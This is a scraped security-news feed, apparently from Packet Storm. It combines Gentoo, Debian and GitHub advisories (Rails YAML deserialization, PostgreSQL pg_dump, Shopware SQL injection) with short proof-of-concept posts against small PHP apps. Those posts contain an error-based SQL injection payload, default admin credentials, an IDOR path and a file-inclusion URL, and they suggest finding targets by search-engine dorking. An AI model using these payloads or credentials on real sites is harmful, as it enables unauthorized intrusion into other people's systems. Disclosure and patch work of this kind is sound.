Gentoo Linux Security Advisory 202408-24 - A vulnerability has been discovered in Ruby on Rails, which can lead to remote code execution via serialization of data. Versions greater than or equal to 6.1.6.1:6.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-24  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Ruby on Rails: Remote Code Execution  
     Date: August 11, 2024  
     Bugs: #857840  
       ID: 202408-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Ruby on Rails, which can lead to  
remote code execution via serialization of data.

Background  
==========

Ruby on Rails is a free web framework used to develop database-driven  
web applications.

Affected packages  
=================

Package         Vulnerable     Unaffected  
--------------  -------------  --------------  
dev-ruby/rails  < 6.1.6.1:6.1  >= 6.1.6.1:6.1  
                < 7.0.3.1:7.0  >= 7.0.3.1:7.0

Description  
===========

Multiple vulnerabilities have been discovered in Ruby on Rails. Please  
review the CVE identifiers referenced below for details.

Impact  
======

When serialized columns that use YAML (the default) are deserialized,  
Rails uses YAML.unsafe_load to convert the YAML data in to Ruby objects.  
If an attacker can manipulate data in the database (via means like SQL  
injection), then it may be possible for the attacker to escalate to an  
RCE.

Impacted Active Record models will look something like this:

class User < ApplicationRecord  
  serialize :options       # Vulnerable: Uses YAML for serialization  
  serialize :values, Array # Vulnerable: Uses YAML for serialization  
  serialize :values, JSON  # Not vulnerable  
end

The released versions change the default YAML deserializer to use  
YAML.safe_load, which prevents deserialization of possibly dangerous  
objects. This may introduce backwards compatibility issues with existing  
data.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Ruby on Rails users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/rails-6.1.6.1:6.1"  
  # emerge --ask --oneshot --verbose ">=dev-ruby/rails-7.0.3.1:7.0"

References  
==========

[ 1 ] CVE-2022-32224  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32224

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-24

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-24

Garden Gate version 2.6 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Garden Gate v2.6 SQL injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.34network.it/                                                                                                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /prodotto.php?id=\[+] https://www/127.0.0.1/demo/paiardicom/prodotto.php?id=\ <=== inject here ---Parameter: id (GET)    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: id=\' AND GTID_SUBSET(CONCAT(0x716b786b71,(SELECT (ELT(6210=6210,1))),0x716b7a7671),6210)-- WkuH --- [+]  Login : https://www/127.0.0.1/demo/www.paiardicom/tq/index.php?manager=loginGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Garden Gate 2.6 SQL Injection

Gaati Track version 1.0-2023 suffers from an ignored default credential vulnerability.

**Goati Track 1.0-2023 Insecure Settings**

Posted Aug 12, 2024

Authored by indoushka

Gaati Track version 1.0-2023 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | a66751e0a18c1729e99f89ffd55d400c761bad76139bca2c36b5ffb404b06d8e

Download | Favorite | View

**Goati Track 1.0-2023 Insecure Settings**

    =============================================================================================================================================| # Title     : Gaati track v1.0-2023 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  mayuri@admin.com & pass = admin[+] https://www/127.0.0.1/165.232.176.122/index.php?page=homeGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,349)
*   Arbitrary (16,870)
*   BBS (2,859)
*   Bypass (1,861)
*   CGI (1,033)
*   Code Execution (7,810)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,390)
*   DoS (25,071)
*   Encryption (2,389)
*   Exploit (53,180)
*   File Inclusion (4,262)
*   File Upload (994)
*   Firewall (822)
*   Info Disclosure (2,890)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,202)
*   Local (14,795)
*   Magazine (586)
*   Overflow (13,169)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,393)
*   Protocol (3,724)
*   Python (1,640)
*   Remote (31,655)
*   Root (3,635)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,276)
*   SQL Injection (16,609)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,967)
*   Web (9,963)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,250)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,096)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,707)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,485)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,737)
*   UNIX (9,435)
*   UnixWare (187)
*   Windows (6,672)
*   Other

Goati Track 1.0-2023 Insecure Settings

Farmacia Gama version 1.0 suffers from an insecure direct object reference vulnerability.

**Farmacia Gama 1.0 Insecure Direct Object Reference**

Posted Aug 12, 2024

Authored by indoushka

Farmacia Gama version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 03b0ac64f0e5daeb38f4901ddbe680af2e5d9a8749a1b826aadf371e13ec4f05

Download | Favorite | View

**Farmacia Gama 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 IDOR Vulnerability                                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : allows users to access the administrative interface.[+] use payload : /main.php[+] http://127.0.0.1/farmacia-master/main.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,349)
*   Arbitrary (16,870)
*   BBS (2,859)
*   Bypass (1,861)
*   CGI (1,033)
*   Code Execution (7,810)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,390)
*   DoS (25,071)
*   Encryption (2,389)
*   Exploit (53,180)
*   File Inclusion (4,262)
*   File Upload (994)
*   Firewall (822)
*   Info Disclosure (2,890)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,202)
*   Local (14,795)
*   Magazine (586)
*   Overflow (13,169)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,393)
*   Protocol (3,724)
*   Python (1,640)
*   Remote (31,655)
*   Root (3,635)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,276)
*   SQL Injection (16,609)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,967)
*   Web (9,963)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,250)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,096)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,707)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,485)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,737)
*   UNIX (9,435)
*   UnixWare (187)
*   Windows (6,672)
*   Other

Farmacia Gama 1.0 Insecure Direct Object Reference

Employee Management System version 1.0 suffers from an ignored default credential vulnerability.

**Employee Management System 1.0 Insecure Settings**

Posted Aug 12, 2024

Authored by indoushka

Employee Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4c729820d6c74d0d245f5de6b7ade8e4cebaa60f462a3e7bd0e326402db59bf4

Download | Favorite | View

**Employee Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Employee Management System v1.0 Insecure Settings Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16999/employee-management-system.html                                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,349)
*   Arbitrary (16,870)
*   BBS (2,859)
*   Bypass (1,861)
*   CGI (1,033)
*   Code Execution (7,810)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,390)
*   DoS (25,071)
*   Encryption (2,389)
*   Exploit (53,180)
*   File Inclusion (4,262)
*   File Upload (994)
*   Firewall (822)
*   Info Disclosure (2,890)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,202)
*   Local (14,795)
*   Magazine (586)
*   Overflow (13,169)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,393)
*   Protocol (3,724)
*   Python (1,640)
*   Remote (31,655)
*   Root (3,635)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,276)
*   SQL Injection (16,609)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,967)
*   Web (9,963)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,250)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,096)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,707)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,485)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,737)
*   UNIX (9,435)
*   UnixWare (187)
*   Windows (6,672)
*   Other

Employee Management System 1.0 Insecure Settings

Debian Linux Security Advisory 5746-1 - Noah Misch discovered a race condition in the pg_dump tool included in PostgreSQL, which may result in privilege escalation.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5746-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 09, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-13CVE ID         : CVE-2024-7348Noah Misch discovered a race condition in the pg_dump tool included inPostgreSQL, which may result in privilege escalation.For the oldstable distribution (bullseye), this problem has been fixedin version 13.16-0+deb11u1.We recommend that you upgrade your postgresql-13 packages.For the detailed security status of postgresql-13 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-13Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma11EEACgkQEMKTtsN8TjZxwg//bEVYrijo3AoQCcZMdHcgEPvJPYNUvCAsoX9NBiLzSPs0A8zW6OVmo3uCX+vY/YziF6z7CFU0BkFMDUGnbDnmAuMT2ZY7K2kqyUas3EwEsf3WScPDtRbo5V5ScXWUz+uuuAzibJWSZUr/MqjCojb5KwWoVKF5cw6e9glQNMgi0txLi+7xWK0Hkhye39Dm/RE9Brd6tyvSx5mm/sAuPv3H6ZktnIrWOrdZlglsiPURjUsY7ThYBrjbc/lLR3zNEYxHEvFf3MaXbud98wPou8tLl5qMSIZDYuc+IvYVCgCVUeiDUuPng5i23f4da0BoDRvzKk/7+20g3Z7pZm3kJJk+TYifELXEM2SFkLv/2rD4YVuqhMOkmsqYQXgLgvJ+XxkSzgnNBB7cML1F4+hq9zGtHyJgNiiaOfFFoL583WbHl7oRLAg+y0SCnXlCewft4KrIBhEe1zOJIuGQ/WL611/5dGy5tqkvivIoVbvcYZxmoVE5kllZEFjSsmfADfbn+HtA0lOHDwfyuBnvWOqzDgTd2BCdGIaF2+/FtUpqJDmjH6TnujtqDh6MmsbOaF/qw9XuI3jzORNjrLdFoJwya9N79vTYTgCFJEWl3oGygVkTG2RRhsqY6kNgQ6pykcfcw+m0uZFoT6SRNBllFhyrRTdvcm6GB5yXwVJKwERgRVlJWCM=wYjH-----END PGP SIGNATURE-----

Debian Security Advisory 5746-1

Debian Linux Security Advisory 5745-1 - Noah Misch discovered a race condition in the pg_dump tool included in PostgreSQL, which may result in privilege escalation.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5745-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 09, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-15CVE ID         : CVE-2024-7348Noah Misch discovered a race condition in the pg_dump tool included inPostgreSQL, which may result in privilege escalation.For the stable distribution (bookworm), this problem has been fixed inversion 15.8-0+deb12u1.We recommend that you upgrade your postgresql-15 packages.For the detailed security status of postgresql-15 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-15Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma11EAACgkQEMKTtsN8TjaqZRAAtSdRKaKkHTz14XjjqH3d4lBvZpkZB5p5phqeR2KM2+ZpA++YalAcrnRiAmhHEb0uoCV4R8zQxGw23zpjWKyR3uvW2RMyK1S62eOvZ7u+ia7iffNhmHzzQWdVYcjCbJSMw2gpNo71houCZ5064Z86AFLpzd/HY0rlTnlF73gpXGndOnN8nRNagimLQ0N3kY5yt7HNDKnOkZtsZkHoyQ52eCobXuXTJ3b/QgbzAMR6tWdp7P6Vlf1d0H0JA3npdCYDh4cY+TyGVXYiR1KjU7qtYDLf5cWbUC1ie8iE811Y0nNSP22zd/0zH2WVJDbMFxsej1WE1fSLa/ksr+22KHwjpQwz76hcHEUZbrBdP/2qAs6CV203mpqZD0GrYI6wASQbXQEPgzVLFhnHYISnNTv/ggX+w/shcB6qp1y1gs4FEYIf9D3btKZutiNDkSBh4v43GBI0j7nOMd/Je2Dvg4JzFZ5k57SaMYfS7Qkic3/h2h2VYXK0KiaNoGQsnrCGAW6GU+Owccr02UYgBYPedK9ZU9ZXIgUfrRG0087vxm0hfrpmQd4+yb3Yc60uRCV1YD/NEeQTD538T/UjdBXhnHIPdFK6hHasbuRbB7+ZwSAEV9aaY04kif27ANz79aVAGdFoVYNS9o0bkCWJ0+IH3J6iLTBj7Oe3hv6cXunj/X8rGyM==nOfc-----END PGP SIGNATURE-----

Debian Security Advisory 5745-1

Gentoo Linux Security Advisory 202408-15 - Multiple vulnerabilities have been discovered in Percona XtraBackup, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 8.0.29.22 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Percona XtraBackup: Multiple Vulnerabilities  
     Date: August 09, 2024  
     Bugs: #849389, #908033  
       ID: 202408-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Percona XtraBackup, the  
worst of which could lead to arbitrary code execution.

Background  
==========

Percona XtraBackup is a complete and open source online backup solution  
for all versions of MySQL.

Affected packages  
=================

Package                        Vulnerable    Unaffected  
-----------------------------  ------------  ------------  
dev-db/percona-xtrabackup      < 8.0.29.22   >= 8.0.29.22  
dev-db/percona-xtrabackup-bin  < 8.0.29.22   Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in Percona XtraBackup.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Percona XtraBackup users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-db/percona-xtrabackup-8.0.29.22"

Gentoo has discontinued support for the binary package. Users should  
remove this from their system:

  # emerge --sync  
  # emerge --ask --verbose --depclean "dev-db/percona-xtrabackup-bin"

References  
==========

[ 1 ] CVE-2022-25834  
      https://nvd.nist.gov/vuln/detail/CVE-2022-25834  
[ 2 ] CVE-2022-26944  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26944

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-15

Farmacia Gama version 1.0 suffers from a file inclusion vulnerability.

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 File inclusion Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?id=1&pg=[+] http://127.0.0.1/farmacia-master/main.php?id=1&pg=http://127.0.0.1/phpMyAdmin/themes/pmahomme/img/logo_left.pngGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Farmacia Gama 1.0 File Inclusion 

### Impact

The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the “aggregations”
object. The ‘name’ field in this “aggregations” object is vulnerable SQL-injection and can be exploited using SQL parameters.

### Patches

Update to Shopware 6.6.5.1 or 6.5.8.13

### Workarounds

For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.

### Credit

[LogicalTrust](https://logicaltrust.net)

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-42357

**Shopware vulnerable to blind SQL-injection in DAL aggregations**

High severity GitHub Reviewed Published Aug 8, 2024 in shopware/shopware • Updated Aug 8, 2024

**Package**

composer shopware/core (Composer)

**Affected versions**

<= 6.5.8.12

\>= 6.6.0.0, <= 6.6.5.0

**Patched versions**

6.5.8.13

6.6.5.1

<= 6.5.8.12

\>= 6.6.0.0, <= 6.6.5.0

**Impact**

The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the “aggregations”  
object. The ‘name’ field in this “aggregations” object is vulnerable SQL-injection and can be exploited using SQL parameters.

**Patches**

Update to Shopware 6.6.5.1 or 6.5.8.13

**Workarounds**

For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.

**Credit**

LogicalTrust

**References**

*   GHSA-p6w9-r443-r752
*   shopware/core@63c0561
*   shopware/core@a784aa1
*   shopware/shopware@57ea2f3
*   shopware/shopware@8504ba7

Published to the GitHub Advisory Database

Aug 8, 2024

Tag

#sql